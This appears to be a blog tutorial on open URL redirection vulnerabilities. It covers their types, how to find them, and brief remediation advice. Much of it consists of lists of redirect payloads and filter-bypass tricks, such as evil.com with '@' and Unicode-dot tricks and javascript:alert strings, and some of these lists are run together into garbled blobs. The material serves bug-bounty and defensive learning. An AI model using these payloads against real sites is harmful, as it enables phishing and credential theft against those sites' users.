Open URL Redirection

open Url Re direct

URL Redirection is a vulnerability which allows an attacker to force users of your application to an untrusted external site. also known as “Unvalidated Redirects and Forwards”, Also redirection is a technique for shifting users to a different web page than the URL they requested.

An Open Redirection vulnerability is when the attackers can control to where a victim is redirected when using a web application, thus allowing them to redirect the victim to malicious websites controlled by the attackers.

When this vulnerability arises.

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way.

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input.

By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

Types of URL redirections:

TYPE 1 — PARAMETER BASED URL REDIRECTION

Parameter based URL redirection is the most common and easy to spot. There are two behaviours which contribute to this issue: Eg:

1. A GET parameter containing a URL/URI.

2. A 302/301 redirect made using that parameter.

TYPE 2- SESSION RESTORATION URL REDIRECTION

Ever click a link within an application, only to find out your session has terminated? Many applications will give the courtesy of preserving the last URL they viewed, and redirect them to that location after they authenticate. This feature is useful, but is commonly the source of URL Redirection vulnerabilities. Eg:

1. https://example.com/login?returnUrl=/dashboard

2. https://example.com/login?returnUrl=https://www.virtuesecurity.com

TYPE 3 — DOM BASED URL REDIRECTION

Remember that JavaScript can obtain data directly from the browser. A URL in your web browser such as https://example.com/#dashboard, does not send #dashboard to the application. In fact, you can verify this with Burp

How to find open redirect? Example scenario 1

1. If the Application have a user Sign-In/Sign-Up feature, then register a user and log in as the user.

2. Go to your user profile page , for example : example.com/accounts/profile

3. Copy the profile page’s URL

4. Logout and Clear all the cookies and go to the homepage of the site.

5. Paste the Copied Profile URL on the address bar

6. If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following.

- https://vuln.me/login?next=/accounts/profile

- https://vuln.me/login?returnUrl=/accounts/profile

Possible open redirect parameters Payloads

Should Replace target.com by specific url or IP

http://www.example.com/function.jsp?fwd=admin.jsp

?url=http://{target}

?url=https://{target}

?next=http://{target}

?next=https://{target}

?url=https://{target}

?url=http://{target}

?url=//{target}

?url=$2f%2f{target}

?next=//{target}

?next=$2f%2f{target}

?url=//{target}

?url=$2f%2f{target}

?url=//{target}

/redirect/{target}

/cgi-bin/redirect.cgi?{target}

/out/{target}

/out?{target}

/out?/{target}

/out?//{target}

/out?/\{target}

/out?///{target}

?view={target}

?view=/{target}

?view=//{target}

?view=/\{target}

?view=///{target}

/login?to={target}

/login?to=/{target}

/login?to=//{target}

/login?to=/\{target}

/login?to=///{target}

Open Redirect Vulnerable Payloads

Should Replace targetwebapp.com or www.whitelisteddomain.com or example.com or localdomian by specific url or IP

/%09/targetwebapp.com/%5c targetwebapp.com//www. targetwebapp.com/%2f%2e%2e//www. targetwebapp.com/%2e%2e// targetwebapp.com/// targetwebapp.com/%2f..//\ targetwebapp.com/\victim.com:80%40 targetwebapp.com/%2f%2f%2fbing.com%2f%3fwww.omise.co////%5cexample.com///\;@example.com////www.whitelisteddomain.tld@google.com/%2f..//www.whitelisteddomain.tld@google.com///%09/www.whitelisteddomain.tld@google.comjavascript:alert(1);java%0d%0ascript%0d%0a:alert(0)";alert(0);//javascript://www.whitelisteddomain.tld?%a0alert%281%29<>javascript:alert(1);///example.com/%2e%2e%2f//https://example.com/%2e%2e%2f/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com

/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com

/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

https://www.whitelisteddomain.tld@localdomain.pw////https://localdomain.pw////localdomain.pw\@www.whitelisteddomain.tldhttps://:@localdomain.pw\@www.whitelisteddomain.tldhttp://localdomain.pw:80#@www.whitelisteddomain.tld/http://localdomain.pw:80?@www.whitelisteddomain.tld/http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw///localdomain.pw\twww.whitelisteddomain.tld/http://;@localdomain.pwhttp://localdomain.pw%2f%2f.www.whitelisteddomain.tld/

How to bypass filters?

If periods are being stripped by the filter so that evil.com becomes evilcom, try converting the ip address to decimal notation form.

1. https://vuln.me/login?next=https://vuln.me@evil.com

2. https://vuln.me/login?next=http://evil%E3%80%82com ( By using the character (%E3%80%82 url encoded) instead of a normal dot in urls, it is possible to bypass the blocking. )

Remediation: Open redirection.

  • Whitelisting urls
  • Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
  • Maintain a server-side list of all URLs that are permitted for redirection.

Recommended open redirect bypass tool

- https://github.com/adelittle/aincurl

--

--

--

A white hat Hacker...!!!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Creating a Todo Chrome Extension with React, Custom Hooks and Local Storage

A Quick Intro to React Hooks

N ways to debug React Native app

How to Load Images to Cut Page Time

Introduction to React

AEM: Creating custom Granite render conditions

https://indicoins.com/register/1LuSVu

Pudding Bootcamp: Part III

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash Venky

Akash Venky

A white hat Hacker...!!!

More from Medium

A Peculiar Case of XSS and my first bug

BruteLoops — Protocol Agnostic Online Password Guessing API

VulnHub Walkthrough’s : BOX 1

Understand Broken Authentication in 3 minutes